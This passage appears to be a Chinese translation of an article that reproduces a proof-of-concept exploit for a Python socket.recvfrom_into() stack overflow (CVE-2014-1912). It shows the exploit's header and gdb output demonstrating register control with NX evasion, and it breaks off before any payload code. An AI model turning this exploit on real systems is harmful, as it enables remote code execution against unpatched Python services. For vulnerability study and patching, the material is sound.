最近,pastebin上发布了一个exploit,是关于Python 2.7和3.x版本中的socket.recvfrom_into()函数中一个远程代码执行漏洞(栈溢出)的PoC。
(有些地方pastebin.com可能被墙了,为了方便,译者把它拷贝到文章里。)原exploit如下:#!/usr/bin/env python'''
# Exploit Title: python socket.recvfrom_into() remote buffer overflow
# Date: 21/02/2014
# Exploit Author: @sha0coder
# Vendor Homepage: python.org
# Version: python2.7 and python3
# Tested on: linux 32bit + python2.7
# CVE : CVE-2014-1912
socket.recvfrom_into() remote buffer overflow Proof of concept
by @sha0coder
With NX evasion!
(gdb) x/i $eip
=> 0x817bb28:mov eax,DWORD PTR [ebx+0x4] eax full conrol
0x817bb2b:test BYTE PTR [eax+0x55],0x40
0x817bb2f:jne 0x817bb38 -->
...
0x817bb38:mov eax,DWORD PTR [eax+0xa4]
0x817bb3e:tes